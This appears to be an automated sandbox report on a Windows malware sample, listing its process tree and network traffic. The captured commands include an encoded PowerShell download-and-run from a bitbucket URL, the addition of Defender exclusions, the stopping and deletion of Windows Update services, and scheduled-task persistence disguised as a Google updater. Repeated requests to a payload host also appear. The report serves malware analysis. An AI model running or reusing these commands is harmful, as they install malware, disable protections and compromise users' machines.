AnACkAKQA8ACMAawBpAHgAIwA+ADsAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYgBpAHQAYgB1AGMAawBlAHQALgBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBvAHIAZwAvAHIAZQBjAGgAZQBhAHQAcwBkAGkAcgBlAGMAdAAvAHIAYQB3AC8AMAAwAGUAYgAyAGQAMABiADQAMwA2ADUAOQAxAGYAYwBlADEAMQA1ADMAYgBhAGMAYQA3ADYAMgA1ADAAOQBlADcANgAyAGYAMgBjAGUANAAvAEQAZQB2AG0AaQBuAC4AZQB4AGUAJwAsACAAPAAjAGQAdQBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAaABoAHQAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAdQBzAHIAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAUwBlAG4AZAAuAGUAeABlACcAKQApADwAIwBoAHcAbgAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAG0AagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZwB1AGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcATABpAGMAZQBuAHMAZQBHAGUAdAAuAGUAeABlACcAKQA8ACMAdABhAGIAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB1AG4AIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHYAaQBlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAEMAaABlAGMAawAuAGUAeABlACcAKQA8ACMAbgBqAHcAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAaQB4AGkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAbQBsACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEwAaQBjAFMAZQBuAGQALgBlAHgAZQAnACkAPAAjAGQAbgBnACMAPgA="
                                                                                          3⤵
                                                                                          • Blocklisted process makes network request
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:2848
                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-Type -AssemblyName System.Windows.Forms;<#nus#>[System.Windows.Forms.MessageBox]::Show('No Virtual Machine/Server is allowed! Try running on a different device!','','OK','Error')<#wkk#>;
                                                                                            4⤵
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:3232
                                                                                          • C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\LicenseGet.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:2652
                                                                                          • C:\Users\Admin\AppData\Local\Temp\LicCheck.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\LicCheck.exe"
                                                                                            4⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            PID:2100
                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                              "C:\Windows\System32\schtasks.exe" /create /tn "svcupdater" /tr "C:\Users\Admin\AppData\Roaming\Win32Sync\svcupdater.exe" /st 00:00 /du 9999:59 /sc once /ri 1 /f
                                                                                              5⤵
                                                                                              • System Location Discovery: System Language Discovery
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:4944
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                6⤵
                                                                                                  PID:5000
                                                                                            • C:\Users\Admin\AppData\Local\Temp\LicSend.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\LicSend.exe"
                                                                                              4⤵
                                                                                              • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                              • Drops file in Drivers directory
                                                                                              • Executes dropped EXE
                                                                                              • Suspicious use of SetThreadContext
                                                                                              • Drops file in Program Files directory
                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                              • Suspicious use of WriteProcessMemory
                                                                                              PID:2416
                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                                                                          2⤵
                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                          PID:4884
                                                                                        • C:\Windows\System32\cmd.exe
                                                                                          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                          2⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3344
                                                                                          • C:\Windows\System32\sc.exe
                                                                                            sc stop UsoSvc
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4720
                                                                                          • C:\Windows\System32\sc.exe
                                                                                            sc stop WaaSMedicSvc
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:3132
                                                                                          • C:\Windows\System32\sc.exe
                                                                                            sc stop wuauserv
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4768
                                                                                          • C:\Windows\System32\sc.exe
                                                                                            sc stop bits
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:4000
                                                                                          • C:\Windows\System32\sc.exe
                                                                                            sc stop dosvc
                                                                                            3⤵
                                                                                            • Launches sc.exe
                                                                                            PID:3312
                                                                                          • C:\Windows\System32\reg.exe
                                                                                            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
                                                                                            3⤵
                                                                                              PID:4212
                                                                                            • C:\Windows\System32\reg.exe
                                                                                              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
                                                                                              3⤵
                                                                                                PID:228
                                                                                              • C:\Windows\System32\reg.exe
                                                                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                                                                                                3⤵
                                                                                                • Modifies security service
                                                                                                PID:236
                                                                                              • C:\Windows\System32\reg.exe
                                                                                                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                                                                                                3⤵
                                                                                                  PID:2728
                                                                                                • C:\Windows\System32\reg.exe
                                                                                                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                                                                                                  3⤵
                                                                                                    PID:928
                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                                                                                  2⤵
                                                                                                  • Power Settings
                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                  PID:3484
                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                    powercfg /x -hibernate-timeout-ac 0
                                                                                                    3⤵
                                                                                                    • Power Settings
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4152
                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                    powercfg /x -hibernate-timeout-dc 0
                                                                                                    3⤵
                                                                                                    • Power Settings
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3880
                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                    powercfg /x -standby-timeout-ac 0
                                                                                                    3⤵
                                                                                                    • Power Settings
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4860
                                                                                                  • C:\Windows\System32\powercfg.exe
                                                                                                    powercfg /x -standby-timeout-dc 0
                                                                                                    3⤵
                                                                                                    • Power Settings
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:3052
                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ncotqmia#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
                                                                                                  2⤵
                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                  PID:5108
                                                                                                • C:\Windows\System32\dialer.exe
                                                                                                  C:\Windows\System32\dialer.exe
                                                                                                  2⤵
                                                                                                    PID:2376
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                  1⤵
                                                                                                    PID:3444
                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                    1⤵
                                                                                                      PID:3500
                                                                                                    • C:\Windows\System32\RuntimeBroker.exe
                                                                                                      C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                      1⤵
                                                                                                        PID:3856
                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                        1⤵
                                                                                                          PID:3924
                                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                          1⤵
                                                                                                            PID:3984
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
                                                                                                            1⤵
                                                                                                              PID:4016
                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
                                                                                                              1⤵
                                                                                                                PID:4268
                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
                                                                                                                1⤵
                                                                                                                  PID:4356
                                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:4804
                                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                                    1⤵
                                                                                                                      PID:3992
                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                      C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                                      1⤵
                                                                                                                        PID:2280
                                                                                                                      • C:\Windows\system32\svchost.exe
                                                                                                                        C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                                                        1⤵
                                                                                                                          PID:3416
                                                                                                                        • C:\Windows\System32\svchost.exe
                                                                                                                          C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                                                          1⤵
                                                                                                                            PID:4468
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                                            1⤵
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:3732
                                                                                                                          • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                                            "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                                            1⤵
                                                                                                                            • Drops file in System32 directory
                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                            PID:2164
                                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                            1⤵
                                                                                                                              PID:4556
                                                                                                                            • C:\Windows\system32\DllHost.exe
                                                                                                                              C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                              1⤵
                                                                                                                                PID:3420
                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                                                1⤵
                                                                                                                                  PID:2096

                                                                                                                                Network

                                                                                                                                • flag-us
                                                                                                                                  DNS
                                                                                                                                  bitbucket.org
                                                                                                                                  powershell.exe
                                                                                                                                  Remote address:
                                                                                                                                  8.8.8.8:53
                                                                                                                                  Request
                                                                                                                                  bitbucket.org
                                                                                                                                  IN A
                                                                                                                                  Response
                                                                                                                                  bitbucket.org
                                                                                                                                  IN A
                                                                                                                                  185.166.142.21
                                                                                                                                  bitbucket.org
                                                                                                                                  IN A
                                                                                                                                  185.166.142.23
                                                                                                                                  bitbucket.org
                                                                                                                                  IN A
                                                                                                                                  185.166.142.22
                                                                                                                                • flag-us
                                                                                                                                  DNS
                                                                                                                                  21.142.166.185.in-addr.arpa
                                                                                                                                  powershell.exe
                                                                                                                                  Remote address:
                                                                                                                                  8.8.8.8:53
                                                                                                                                  Request
                                                                                                                                  21.142.166.185.in-addr.arpa
                                                                                                                                  IN PTR
                                                                                                                                  Response
                                                                                                                                • flag-us
                                                                                                                                  DNS
                                                                                                                                  nexusrules.officeapps.live.com
                                                                                                                                  powershell.exe
                                                                                                                                  Remote address:
                                                                                                                                  8.8.8.8:53
                                                                                                                                  Request
                                                                                                                                  nexusrules.officeapps.live.com
                                                                                                                                  IN A
                                                                                                                                  Response
                                                                                                                                  nexusrules.officeapps.live.com
                                                                                                                                  IN CNAME
                                                                                                                                  prod.nexusrules.live.com.akadns.net
                                                                                                                                  prod.nexusrules.live.com.akadns.net
                                                                                                                                  IN A
                                                                                                                                  52.111.227.14
                                                                                                                                • flag-us
                                                                                                                                  DNS
                                                                                                                                  self.events.data.microsoft.com
                                                                                                                                  powershell.exe
                                                                                                                                  Remote address:
                                                                                                                                  8.8.8.8:53
                                                                                                                                  Request
                                                                                                                                  self.events.data.microsoft.com
                                                                                                                                  IN A
                                                                                                                                  Response
                                                                                                                                  self.events.data.microsoft.com
                                                                                                                                  IN CNAME
                                                                                                                                  self-events-data.trafficmanager.net
                                                                                                                                  self-events-data.trafficmanager.net
                                                                                                                                  IN CNAME
                                                                                                                                  onedscolprdweu04.westeurope.cloudapp.azure.com
                                                                                                                                  onedscolprdweu04.westeurope.cloudapp.azure.com
                                                                                                                                  IN A
                                                                                                                                  20.50.201.200
                                                                                                                                • flag-us
                                                                                                                                  DNS
                                                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                                                  NetworkService
                                                                                                                                  Remote address:
                                                                                                                                  8.8.8.8:53
                                                                                                                                  Request
                                                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                                                  IN PTR
                                                                                                                                  Response
                                                                                                                                  8.8.8.8.in-addr.arpa
                                                                                                                                  IN PTR
                                                                                                                                  dnsgoogle
                                                                                                                                • flag-us
                                                                                                                                  DNS
                                                                                                                                  95.53.214.95.in-addr.arpa
                                                                                                                                  NetworkService
                                                                                                                                  Remote address:
                                                                                                                                  8.8.8.8:53
                                                                                                                                  Request
                                                                                                                                  95.53.214.95.in-addr.arpa
                                                                                                                                  IN PTR
                                                                                                                                  Response
                                                                                                                                • flag-us
                                                                                                                                  DNS
                                                                                                                                  14.227.111.52.in-addr.arpa
                                                                                                                                  NetworkService
                                                                                                                                  Remote address:
                                                                                                                                  8.8.8.8:53
                                                                                                                                  Request
                                                                                                                                  14.227.111.52.in-addr.arpa
                                                                                                                                  IN PTR
                                                                                                                                  Response
                                                                                                                                • flag-us
                                                                                                                                  DNS
                                                                                                                                  200.201.50.20.in-addr.arpa
                                                                                                                                  NetworkService
                                                                                                                                  Remote address:
                                                                                                                                  8.8.8.8:53
                                                                                                                                  Request
                                                                                                                                  200.201.50.20.in-addr.arpa
                                                                                                                                  IN PTR
                                                                                                                                  Response
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: q3TKg5Sb+qdmLIXOMVSCPaYWSiU6kIogTRFZ6WZ+cmBgvfXRc08Jk2FHR/cH3s/smFp9YkFA8Tvb7bfqySL+sw==
                                                                                                                                  Cookie: CSRF-TOKEN=q3TKg5Sb+qdmLIXOMVSCPaYWSiU6kIogTRFZ6WZ+cmBgvfXRc08Jk2FHR/cH3s/smFp9YkFA8Tvb7bfqySL+sw==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:54:56 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: GPqrE3xdciaz4k8Tqe32ATXxL6Zarzj8x47w7fDSUpYx/VU6Uy7RpKZHWlrIFKqxK0fSXKRVq2h/4kihh+sO2g==
                                                                                                                                  Cookie: CSRF-TOKEN=GPqrE3xdciaz4k8Tqe32ATXxL6Zarzj8x47w7fDSUpYx/VU6Uy7RpKZHWlrIFKqxK0fSXKRVq2h/4kihh+sO2g==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:01 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: u9Fn/JXbD49hoFlC3amYak/n9FugB4FHOHf0o0ADdqsFJDsE2WIwqf3pt3AGORHyXTiomUXgeWuuFlveSeVMlA==
                                                                                                                                  Cookie: CSRF-TOKEN=u9Fn/JXbD49hoFlC3amYak/n9FugB4FHOHf0o0ADdqsFJDsE2WIwqf3pt3AGORHyXTiomUXgeWuuFlveSeVMlA==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:06 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: 9oOA41N4ZT4JqSczgSqMntFgGrNfw2N7snNbgmURj322poeM+idcbPDzpifosLfCEog39XZq/JTgFgwU5EwPKQ==
                                                                                                                                  Cookie: CSRF-TOKEN=9oOA41N4ZT4JqSczgSqMntFgGrNfw2N7snNbgmURj322poeM+idcbPDzpifosLfCEog39XZq/JTgFgwU5EwPKQ==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:11 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: OCNpSo9MggOD1ytVsOp9D6xhvnoBjNdhqmkM0f4hYLD+rgniMmEz5/ZC2BuuXKpo7PGSDDNJxCDvS+VpBs9gXA==
                                                                                                                                  Cookie: CSRF-TOKEN=OCNpSo9MggOD1ytVsOp9D6xhvnoBjNdhqmkM0f4hYLD+rgniMmEz5/ZC2BuuXKpo7PGSDDNJxCDvS+VpBs9gXA==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:17 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: bSuOAigtRSZ4aBRIwSj4MwLdL84FZVoTZbe6BB/RsuVgBtFB4b+JYt+Sh7DNTXoHwPjZ59ZQ+NnNBlUAAq3AdQ==
                                                                                                                                  Cookie: CSRF-TOKEN=bSuOAigtRSZ4aBRIwSj4MwLdL84FZVoTZbe6BB/RsuVgBtFB4b+JYt+Sh7DNTXoHwPjZ59ZQ+NnNBlUAAq3AdQ==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:22 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: 5MlFWMIa+gfKgrA5Y/EdJmD2GA8qLiEdTsL9gF4PxLV0xc/hJWsKWFixpAVZHOBBO8Mzho7iBAzAdvxQknH43g==
                                                                                                                                  Cookie: CSRF-TOKEN=5MlFWMIa+gfKgrA5Y/EdJmD2GA8qLiEdTsL9gF4PxLV0xc/hJWsKWFixpAVZHOBBO8Mzho7iBAzAdvxQknH43g==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:27 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: 3qL3vsMFGLL3EhvIC2f0bGkk2InrFOHqzX7c+S+gpQwZth8iL2+SsmGzauFl41bPkzSmC5QkIM64dJ9ytZg27Q==
                                                                                                                                  Cookie: CSRF-TOKEN=3qL3vsMFGLL3EhvIC2f0bGkk2InrFOHqzX7c+S+gpQwZth8iL2+SsmGzauFl41bPkzSmC5QkIM64dJ9ytZg27Q==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:32 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
                                                                                                                                  X-CSRF-TOKEN: eh4kMrxcCHNhbZKbH0TBUugsjLTKNA+AjW8o/GrhjqYgRaGXpqL+1Z9xuiBzg5eI/CQ1v8gsapc5UPyXY0Jfbg==
                                                                                                                                  Cookie: CSRF-TOKEN=eh4kMrxcCHNhbZKbH0TBUugsjLTKNA+AjW8o/GrhjqYgRaGXpqL+1Z9xuiBzg5eI/CQ1v8gsapc5UPyXY0Jfbg==; LANG=en-US
                                                                                                                                  Response
                                                                                                                                  HTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx
                                                                                                                                  Date: Fri, 04 Oct 2024 04:55:37 GMT
                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                  Connection: close
                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                • flag-pl
                                                                                                                                  GET
                                                                                                                                  http://95.214.53.95/blob/d.ez
                                                                                                                                  LicenseGet.exe
                                                                                                                                  Remote address:
                                                                                                                                  95.214.53.95:80
                                                                                                                                  Request
                                                                                                                                  GET /blob/d.ez HTTP/1.1
                                                                                                                                  Host: 95.214.53.95
                                                                                                                                  User-Agent: curl/5.9
                                                                                                                                  Connection: close
